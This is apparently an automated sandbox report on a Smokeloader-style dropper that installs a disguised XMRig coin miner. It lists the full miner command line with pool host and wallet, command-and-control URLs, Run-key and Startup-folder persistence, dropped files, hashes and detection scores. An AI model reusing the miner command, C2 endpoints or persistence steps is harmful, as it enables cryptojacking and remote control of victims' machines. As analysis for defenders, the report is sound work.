                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: conhost.exe, 0000001E.00000002.4173447200.000002A8EB1B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: conhost.exe, 0000001E.00000002.4173447200.000002A8EB1B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: conhost.exe, 0000001E.00000002.4173447200.000002A8EB1B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: conhost.exe, 0000001E.00000002.4173447200.000002A8EB1B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559658E0 cpuid 0_2_00007FF6559658E0
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF65594A2CC
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: GetLocaleInfoW,GetNumberFormatW,3_2_00007FF7AB4BA2CC
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeQueries volume information: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeQueries volume information: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeQueries volume information: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe VolumeInformation
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655950754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,SleepEx,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF655950754
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559351A4 GetVersionExW,0_2_00007FF6559351A4
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Windows\System32\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Windows\System32\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
                  Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
                  Execution: 1 Windows Management Instrumentation; 2 Command and Scripting Interpreter; At; Cron; Launchd; Scheduled Task; Systemd Timers
                  Persistence: 1 Scripting; 21 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
                  Privilege Escalation: 1 Exploitation for Privilege Escalation; 12 Process Injection; 21 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items
                  Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 12 Process Injection; 2 Obfuscated Files or Information; 11 Software Packing; 1 DLL Side-Loading
                  Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
                  Discovery: 1 System Time Discovery; 141 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 36 System Information Discovery
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
                  Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
                  Command and Control: 11 Encrypted Channel; 1 Non-Standard Port; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Multiband Communication; Commonly Used Port
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
                  Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

                  [Behavior graph: ID 1461232, Sample: h2UFp4aCRq.exe, Startdate: 23/06/2024, Architecture: WINDOWS, Score: 100]

                  Source | Detection | Scanner | Label | Link
                  h2UFp4aCRq.exe | 39% | ReversingLabs | Win64.Trojan.Smokeloader |
                  h2UFp4aCRq.exe | 56% | Virustotal | | Browse

                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe | 100% | Avira | TR/ATRAPS.Gen |
                  C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe | 8% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe | 14% | Virustotal | | Browse
                  C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe | 67% | Virustotal | | Browse
                  C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | 61% | ReversingLabs | Win64.Trojan.DisguisedXMRigMiner |
                  C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | 68% | Virustotal | | Browse
                  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe (copy) | 67% | Virustotal | | Browse

                  No Antivirus matches

                  Source | Detection | Scanner | Label | Link
                  pool-fr.supportxmr.com | 4% | Virustotal | | Browse
                  cv99160.tw1.ru | 2% | Virustotal | | Browse
                  pool.supportxmr.com | 9% | Virustotal | | Browse

                  Source | Detection | Scanner | Label | Link
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                  https://cv99160.tw1.ru/cmd.php?timeout=1 | 0% | Avira URL Cloud | safe |
                  https://cv99160.tw1.ru/cmd.php?hwid=B81A4609 | 0% | Avira URL Cloud | safe |
                  http://cv99160.tw1.rud | 0% | Avira URL Cloud | safe |
                  https://cv99160.tw | 0% | Avira URL Cloud | safe |
                  https://cv99160.tw1.ru/cmd.php?tim | 0% | Avira URL Cloud | safe |
                  https://xmrig.com/wizard%s | 0% | Avira URL Cloud | safe |
                  https://cv99160.tw1.ru/cmd.php?hwid=B8dv | 0% | Avira URL Cloud | safe |
                  https://cv99160.tw | 0% | Virustotal | | Browse
                  https://cv99160.tw1.ru | 0% | Avira URL Cloud | safe |
                  https://xmrig.com/docs/algorithms | 0% | Avira URL Cloud | safe |
                  https://cv99160.tw1.ru/cmd.php?hwid=B81A4609d | 0% | Avira URL Cloud | safe |
                  http://cv99160.tw1.ru | 0% | Avira URL Cloud | safe |
                  https://xmrig.com/wizard%s | 0% | Virustotal | | Browse
                  https://xmrig.com/wizard | 0% | Avira URL Cloud | safe |
                  https://cv99160.tw1.ru/cmd.php | 2% | Virustotal | | Browse
                  https://xmrig.com/docs/algorithms | 2% | Virustotal | | Browse
                  https://xmrig.com/wizard | 1% | Virustotal | | Browse
                  https://cv99160.tw1.ru | 2% | Virustotal | | Browse
                  http://cv99160.tw1.ru | 2% | Virustotal | | Browse
                  https://cv99160.tw1.ru/cmd.php | 0% | Avira URL Cloud | safe |
                  https://cv99160.tw1.ru/cmd.php?hwid=B8dJ | 0% | Avira URL Cloud | safe |
                  https://cv99160.tw1.ru/cmd.php1pool.supportxmr.com:3333 | 0% | Avira URL Cloud | safe |
                  https://cv99160.tw1.ru/cmd.php?timeout=1d | 0% | Avira URL Cloud | safe |
                  https://cv99160.tw1.ru/cmd.php1pool.supportxmr.com:3333 | 2% | Virustotal | | Browse

                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  pool-fr.supportxmr.com | 141.94.96.144 | true | true | | unknown
                  cv99160.tw1.ru | 92.53.96.121 | true | true | | unknown
                  pool.supportxmr.com | unknown | unknown | true | | unknown

                  Name | Malicious | Antivirus Detection | Reputation
                  https://cv99160.tw1.ru/cmd.php?hwid=B81A4609 | false | Avira URL Cloud: safe | unknown
                  https://cv99160.tw1.ru/cmd.php?timeout=1 | false | Avira URL Cloud: safe | unknown
                  https://cv99160.tw1.ru/cmd.php | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown

                  Name | Source | Malicious | Antivirus Detection | Reputation
                  https://cv99160.tw1.ru/cmd.php?tim | yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  http://cv99160.tw1.rud | yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000335D000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://cv99160.tw | yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmp | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                  https://xmrig.com/wizard%s | Driver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                  https://cv99160.tw1.ru/cmd.php?hwid=B8dv | yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://cv99160.tw1.ru | yondex.exe, 00000004.00000002.1885179373.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002711000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003357000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003061000.00000004.00000800.00020000.00000000.sdmp | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                  https://xmrig.com/docs/algorithms | Driver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                  http://cv99160.tw1.ru | yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000335D000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                  https://cv99160.tw1.ru/cmd.php?hwid=B81A4609d | yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://xmrig.com/wizard | Driver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | yondex.exe, 00000004.00000002.1885179373.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002711000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003061000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  https://cv99160.tw1.ru/cmd.php?hwid=B8dJ | yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://cv99160.tw1.ru/cmd.php?timeout=1d | yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003357000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://cv99160.tw1.ru/cmd.php1pool.supportxmr.com:3333 | rolex.exe, 00000003.00000003.1726307942.000001FEAC072000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000692000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown

                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                  141.94.96.195 | unknown | Germany | | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | true
                  92.53.96.121 | cv99160.tw1.ru | Russian Federation | | 9123 | TIMEWEB-ASRU | true
                  141.94.96.71 | unknown | Germany | | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | true
                  141.94.96.144 | pool-fr.supportxmr.com | Germany | | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | true

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1461232
                  Start date and time:2024-06-23 11:30:06 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 10m 28s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:31
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:h2UFp4aCRq.exe
                  renamed because original name is a hash value
                  Original Sample Name:1fecbc51b5620e578c48a12ebeb19bc2.exe
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.mine.winEXE@43/6@2/4
                  EGA Information:
                  • Successful, ratio: 83.3%
                  HCA Information:
                  • Successful, ratio: 84%
                  • Number of executed functions: 140
                  • Number of non-executed functions: 111
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                  Time | Type | Description
                  05:31:02 | API Interceptor | 1x Sleep call for process: h2UFp4aCRq.exe modified
                  05:31:11 | API Interceptor | 10540x Sleep call for process: yondex.exe modified
                  10:31:06 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                  10:31:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                  10:31:27 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url

                                                                              Process:C:\Users\user\Desktop\h2UFp4aCRq.exe
                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):36
                                                                              Entropy (8bit):4.194385682587763
                                                                              Encrypted:false
                                                                              SSDEEP:3:mKDDFRK9NyVXMMH:hBVc2
                                                                              MD5:CE32EEA7C273547D3FB75F8E4191E25A
                                                                              SHA1:07D0EDD1F64C799B01DA4E670126B4B2C5091DDE
                                                                              SHA-256:940D3C2D3A6665D5017C0BF64120A71B2CE61106AE015399282AE8F4656CB91F
                                                                              SHA-512:56DA0BE9E79B98FB276A6D5A26B2FE06035D46E299FC6E6CB4E04BB396D119204881518E93F2184A68AA34FF024F81281F131FF0F98CF39541CF857C96DA95D4
                                                                              Malicious:false
                                                                              Preview:@echo off..start rolex.exe -priverdD
                                                                              Process:C:\Users\user\Desktop\h2UFp4aCRq.exe
                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4605877
                                                                              Entropy (8bit):7.962365224089739
                                                                              Encrypted:false
                                                                              SSDEEP:98304:ZqwfM8jZlts7Dnfg+u5NIg1GbnBH9Ltl4NFA0kA8X1KpWQMt:Zqw0v7DnZu5NnobnDtl4TjZ8X1/QK
                                                                              MD5:8866D677A3309A0AD903F37557C5941B
                                                                              SHA1:2B03D0C6CB74DEFEDFC31154C57B073C889EA11A
                                                                              SHA-256:ECBCCACD00CDF38870BEA7D203909DA1EA2261477125FF7E0BDCEF5F3FC4D17D
                                                                              SHA-512:15535E08A5E224941610C90F0BA3921BB3A1911380889D393AEDBC2E4806910171C81005CDA27D23466292DAEC606ABCB94D0FBF546430D70EA21DE15CFE406E
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                              • Antivirus: Virustotal, Detection: 14%, Browse
                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4157440
                                                                              Entropy (8bit):5.213682809026485
                                                                              Encrypted:false
                                                                              SSDEEP:49152:GBNDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3:GnzP88fBsnZTgOtqB3m1RC3
                                                                              MD5:BD2413C32E34D0031F7881D51AE731FF
                                                                              SHA1:8771733C460F22ADC0E1865F0B3F2AC19E9C1001
                                                                              SHA-256:277E5A809506398685FE20BA674B7F3F75B2E04A34C2B150A84088B266138894
                                                                              SHA-512:612C8B9F86308B13342CEF00B9166084BF36F44ADDD139A0123F84CF9711FB2F03E15E4A0B3D95A6DEAAFB60BCA1CC1436514B2B96F4AAF18B094534C94974CF
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_LoaderBot, Description: Yara detected LoaderBot, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, Author: Joe Security
                                                                              • Rule: MALWARE_Win_CoinMiner04, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: Virustotal, Detection: 67%, Browse
                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe
                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe>), ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):175
                                                                              Entropy (8bit):5.100464637183347
                                                                              Encrypted:false
                                                                              SSDEEP:3:HRAbABGQYm5uOt+kiEaKC5SQnPB4L4NIJ4ovstwWDt+kiE2J5xAIkP2dL4ckiWXU:HRYFVmwOwknaZ5lI4NIJlvstwWDwkn2L
                                                                              MD5:09937BA2D25D3D6420DCB7C6EBF54A22
                                                                              SHA1:3F5E1975D708B9140F7FD3463AAF72F8E3600D4F
                                                                              SHA-256:7F9E2451C312E908F14A00A674EC4A7E35E22B75E5E890A4C4979951DAC99E31
                                                                              SHA-512:A188AEDB80A2C6E5DEF6B7A654714380535AD18DB6DCDABA5C9F0498C725778A5B46867BCD430DDD32DCAFE64580D196F893028BE478F83705FB10C3C37E51FF
                                                                              Malicious:true
                                                                              Preview:[InternetShortcut]..URL=file:///C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe..IconIndex=0..IconFile=C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe\backup (3).ico..
                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe
                                                                              File Type:MS-DOS executable PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                              Category:dropped
                                                                              Size (bytes):4141064
                                                                              Entropy (8bit):5.210440836800201
                                                                              Encrypted:false
                                                                              SSDEEP:49152:SNDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3Z:wzP88fBsnZTgOtqB3m1RC3Z
                                                                              MD5:02569A7A91A71133D4A1023BF32AA6F4
                                                                              SHA1:0F16BCB3F3F085D3D3BE912195558E9F9680D574
                                                                              SHA-256:8D6ABBA9B216172CFC64B8802DB0D20A1C634C96E1049F451EDDBA2363966BF0
                                                                              SHA-512:534BE1FE93EE556A14CFD8FAD5377F57FB056AB4CD2BCA14E4F376F4A25D3D4D270917D68A90B3C40D8A8DAAEBA6F592FA095ECFF478332BA23405D1DF728322
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                                              • Antivirus: Virustotal, Detection: 68%, Browse
                                                                              Joe Sandbox View:
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: W1nnerFree CS2.exe, Detection: malicious, Browse
                                                                              • Filename: KRZyX0PPRm.exe, Detection: malicious, Browse
                                                                              • Filename: lO188m2RAu.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: 01904399.dat.exe, Detection: malicious, Browse
                                                                              • Filename: Vsob3IooE7.exe, Detection: malicious, Browse
                                                                              • Filename: ruZVRNvu0Y.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: WvWlWr2HC0.exe, Detection: malicious, Browse
                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4157440
                                                                              Entropy (8bit):5.213682809026485
                                                                              Encrypted:false
                                                                              SSDEEP:49152:GBNDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3:GnzP88fBsnZTgOtqB3m1RC3
                                                                              MD5:BD2413C32E34D0031F7881D51AE731FF
                                                                              SHA1:8771733C460F22ADC0E1865F0B3F2AC19E9C1001
                                                                              SHA-256:277E5A809506398685FE20BA674B7F3F75B2E04A34C2B150A84088B266138894
                                                                              SHA-512:612C8B9F86308B13342CEF00B9166084BF36F44ADDD139A0123F84CF9711FB2F03E15E4A0B3D95A6DEAAFB60BCA1CC1436514B2B96F4AAF18B094534C94974CF
                                                                              Malicious:true
                                                                              Antivirus:
• Antivirus: Virustotal, Detection: 67%
                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Entropy (8bit):7.892544397980614
                                                                              TrID:
                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:h2UFp4aCRq.exe
                                                                              File size:5'061'451 bytes
                                                                              MD5:1fecbc51b5620e578c48a12ebeb19bc2
                                                                              SHA1:94fe551f4fb3ff76a0be99a962dc20fc2656453e
                                                                              SHA256:9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a
                                                                              SHA512:ede6f39946562e253fcafe225292db32ba30f9476557304ae1769830e3a46c660920c304ca42d52544411e41acfc1bf206c829c98d61948cb595b1fa0105e2d7
                                                                              SSDEEP:98304:6qwWqwfM8jZlts7Dnfg+u5NIg1GbnBH9Ltl4NFA0kA8X1KpWQMg:6qwWqw0v7DnZu5NnobnDtl4TjZ8X1/Qf
                                                                              TLSH:EB361259E7A508F8E0B7E138D9539419F3F93C4D07604A8F63A6816A2F673D0DE3A712
                                                                              Icon Hash:90cececece8e8eb0
                                                                              Entrypoint:0x140032ee0
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x140000000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x66409723 [Sun May 12 10:17:07 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:2
                                                                              File Version Major:5
                                                                              File Version Minor:2
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:2
                                                                              Import Hash:b1c5b1beabd90d9fdabd1df0779ea832
                                                                              Programming Language:
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [IMP] VS2008 SP1 build 30729
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x597a0 | 0x34 | .rdata |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x597d4 | 0x50 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x70000 | 0xff7c | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x6a000 | 0x306c | .pdata |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x80000 | 0x970 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x536c0 | 0x54 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
